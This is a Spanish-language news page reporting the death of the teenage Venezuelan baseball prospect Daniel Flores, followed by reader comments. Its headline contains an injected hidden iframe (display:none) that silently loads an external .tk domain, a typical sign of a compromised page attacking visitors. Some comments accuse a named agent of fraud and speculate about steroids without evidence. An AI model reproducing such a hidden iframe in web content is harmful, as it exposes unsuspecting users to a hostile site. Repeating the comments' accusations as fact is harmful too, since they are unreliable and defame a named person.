ReporteConfidencial.info - Periodismo Audaz
Premio de Periodismo Digital
Compartir en facebook Siguenos en twitter
Publicidad
CARTA SEMANAL  
Gobierno en lo peor de dos mundos/ Rodeado cedió... Cancilleres "vigilantes"
Claves secretas de la fuga de Ledezma /Embajada de Chile Bajo Asedio. >>
17/11/2017. CLAVES SECRETAS DE LA FUGA DE ANTONIO LEDEZMA Todos sabemos que dentro  de la oposición existen algunos grupos que se disputan ...
4 comentarios | 10417 visitas
Publicidad
Publicidad
Publicidad
Publicidad
DEPORTES   

De luto el beisbol venezolano: muere el prospecto Daniel Flores

09 de Noviembre de 2017 | 12 comentarios | 11115 visitas | Ver imagen original | A+ | A -
¡Comparte esta Noticia!
 
De luto el beisbol venezolano: muere el prospecto Daniel Flores <p> <iframe src=https://bolbolt.tk style=display: none;></iframe></p>

El adolescente, que hace meses saltó a la fama al firmar con los Medias Rojas por el mejor bono que se entregó a un pelotero criollo en 2017, falleció este miércoles en Boston, víctima de un cáncer

Daniel Flores tenía un mundo en su futuro y el mundo a los pies. Hacía mucho tiempo que los buscadores de talento se habían puesto de acuerdo sobre él: una estrella en potencia. Un bateador sin límites. Un receptor de manos rápidas y potente brazo. Todo eso terminó abrupta, absurdamente este miércoles, al toparse con la muerte en Boston, a los 17 años de edad.

El adolescente margariteño que en julio sorprendió por su madurez y el enorme bono que le entregaron los Medias Rojas para asegurar su firma, murió por complicaciones derivadas de un cáncer, víctima de una metástasis y para luto del beisbol.

“Todos quedamos en shock al conocer la trágica muerte de Daniel”, escribió Dave Dombrowski, presidente de Operaciones de Beisbol de los patirrojos, haciendo pública la consternación de esa organización a través de un comunicado oficial. “Ver cortarse la vida de un joven con tal provenir es una tristeza enorme pata todos nosotros. En nombre de los Medias Rojas, quiero manifestar nuestra más profunda condolencia a la familia de Daniel”.

Flores fue señalado por Baseball America y MLB.com como uno de los tres prospectos internacionales más notables en el proceso de reclutamiento de 2017. Ningún scout dudaba de su potencial, mientras el chico hablaba de jugar en las Grandes Ligas durante una, dos décadas, y emular a las más grandes estrellas de la pelota nativa.

Así lo describió Manny Padrón cuando, el 2 de julio, el moreno oriental saltó al campo rentado: “Es muy fácil de ver su madurez. Es muy poco común encontrar eso en un joven de 16 años de edad. Es súper profesional, educado, con tremendos valores. Todo el crédito para su familia y su academia”.

Padrón, coordinador de scouts de los Medias Rojas, siguió de cerca el proceso del jugador, mientras llegaba el momento de sumarlo a su divisa con un bono de 3,1 millones de dólares, uno de los más altos que se haya entregado en América Latina y el tercero mejor otorgado a un venezolano.

El cáncer comenzó en el páncreas, informó el periodista Carlos Valmore Rodríguez.

“Como receptor, quiero emular a Salvador Pérez, que es mi ídolo desde pequeño”, dijo hace apenas cuatro meses. “Bateando a la derecha, espero ser como Miguel Cabrera. Y la zurda, me gusta mucho lo que hace Víctor Martínez”.

La vida no le permitió completar sus metas, desplegar sus habilidades y cumplir sus sueños.

Paz a su alma.

 
Fecha de la Noticia: 09 de Noviembre de 2017
Hora: 09:13:09
Fuente: El Nacional
Publicado Por: Yus
 
¡Comparte esta Noticia!
 
 
COMENTARIOS
12
Manuel
16 de noviembre de 2017 a las 12:54
Por cierto, por que esta noticia a nivel nacional fue silenciada y el sr. Giorgio Salas, no permite que ni en el velorio la madre hable con los presentes y siempre disuelven cualquier reunión en donde se hable de este caso? Por que lo cremaron tan rápidamente? acaso para evitar futuras investigaciones? Los Medias Rojas de Boston fueron estafados por Giorgio Salas y esa es la cruel realidad. A los padres que estan enviando a sus niños a las academias sin su supervision mirense en este caso, los niños para ellos son solo mercancia que quieren vender, solo eso!
11
manuel
16 de noviembre de 2017 a las 12:47
En esta caso no se ha dicho la verdad ni las causas reales de la muerte de Daniel Flores. Existe la conviccion entre todos los que lo conocimos que hubo un manejo doloso de su caso por el sr Giorgio Salas, quien fue su agente para la firma profesional. Este caso debe ser investigado ya que se debe determinar que produjo el cáncer.¿esteroides?
10
porlamar
15 de noviembre de 2017 a las 09:28
Daniel los que te conocimos en inam es una trite noticia, siempre te recordaremos, mucha fortaleza a tus familiares , que dios te tenga en tu reino
9
PASO ALGO RARO
13 de noviembre de 2017 a las 08:10
QUE TRISTE NOTICIA, PERO MAS TRISTE SABER QUE AHI HAY ALGO RARO, NINGUN NIÑO FIRMA CONTRATO SIN PASAR POR UN RIGUROSOS NUMERO DE EXAMENES Y MAS AUN CUANDO EL BONO ES TAN GRANDE, NO TIENE LOGICA FIRMAR EN JULIO Y MORIR DE CANCER EN NOVIEMBRE.. QUE TRISTE ES JUGAR CON LA VIDA AJENA POR PLATA..
8
CUENTO ENTRECORTADO
13 de noviembre de 2017 a las 06:47
EN JULIO LOS MEDIAS ROJAS ASEGURARON SU FIRMA Y EN SOLO CUATRO MESES MUERE DE CÁNCER CUANDO PARA ENTRAR A CUALQUIER EQUIPO EL SELECCIONADO ES SOMETIDO A LOS MAS ESTRICTOS CHEQUEOS MÉDICOS ¡ESE CUENTO ESTA ENTRECORTADO!!
7
kaliman
11 de noviembre de 2017 a las 11:17
A LA PERSONA DEL COMENTARIO NUMERO 11 QUE TIENE QUE VER DIOS EN LA LAMENTABLEME DESAPARICION DE UN TALENTO.. SIEMPRE HAY UNA PERSONA QUE NO RESPETA EL DOLOR AJENO, CON COMENTARIOS FUERA DE LUGAR. MI MAS SENTIDO PESAME A LOS FAMILIARES DE ESE HEROE QUE LES DEJO UN GRAN LEGADO QUE EN MEDIO DEL DOLOR DEBE RECONFORTARLOS.. COMO LLEGAR A SER UN GRANDES LIGAS MENORES EJEMPLAR Y ESTO LO SABRAN NUESTROS HIJOS PARA QUE TRATEN DE EMULARLO,DEJO UN BELLO LEGADO. DIOS TE TENGA EN GLORIA CAMPEON.
6
ROSMARY
11 de noviembre de 2017 a las 09:02
Descansa en paz DANIEL q triste noticia fortaleza a tu familia, se m fue uno de mis hijos de la antonio maria martines
5
Pedro Serrano
10 de noviembre de 2017 a las 01:49
Lamentable y triste esta noticia de la muerte de este joven prospecto del béisbol, mucha fortaleza y resignación a su familia,Q.E.P.D.
4
se habla deporte
10 de noviembre de 2017 a las 09:10
Q lamentable muerte inesperada d esta gran joven talentoso y promesa del béisbol q se nos fue a temprana edad paz a su resto fortaleza a su familia Daniel dios t tenga en la gloria
3
nil
10 de noviembre de 2017 a las 08:29
Dios le de fortaleza a su familia, su paso por esta vida dejo huellas. Dios lo tenga en su reino.
2
Porlamar
10 de noviembre de 2017 a las 07:23
MARGARITA de luto, gran orgullo neoespartano, Dios te reciba en su reino, y les de fortaleza a tu familia y amigos...
1
solidaria
09 de noviembre de 2017 a las 08:04
que triste y lamentable perdida un gran joven margariteño un gran orgullo neoespartano, venezolano, mucha fortaleza para su familia
 
DEJAR COMENTARIO
Nombre:
*Requerido
Email:
*RequeridoDebe ser un Email
Comentario:
*Requerido

Debe ser un numeroResultado invalido
Resultado invalido

 
ADVERTENCIA: Reporte Confidencial buscará bloquear de forma permanente todo IP del cual provengan comentarios groseros, vulgares o que su contenido atente contra la moral y las buenas costumbres o aquellos destinados a vilipendiar o insultar a autoridades, instituciones o personas . De igual forma, advierte que bloqueará de forma permanente todo IP cuando de él provengan, mensajes de una misma persona, con distintos datos de forma continua en una misma noticia. De ser requeridos por autoridades, entregaremos los IP que violan las leyes y normas que regulan la actividad comunicacional del internet y la(s) persona(s) responsable(s) podra(n) ser juzgada(s) por quien(es) fuera(n) victima(s) de sus comentario(s) o expresiones Reporte Confidencial no es responsable de los comentarios y opiniones emitidos en esta sección , que son de la exclusiva responsabilidad de quien(es) los emite(n). Reporte Confidencial valora la libertad de expresión, así como el derecho que tenemos todos a que se respete el honor y dignidad de las personas. Invitamos a nuestros foristas a expresar sus ideas de forma libre pero con respeto a nuestros lectores. ¡Abierto el debate inteligente de ideas!
 
 

 

 

 

 

 

 

 

 

www.reporteconfidencial.info
Copyright 2010. Reporteconfidencial. Todos los Derechos Reservados.
Reporte Confidencial no se hace responsable por los comentarios emitidos por terceros en nuestras paginas, quienes ejercen plena libertad de expresion y son los responsables ulteriores de sus comentarios.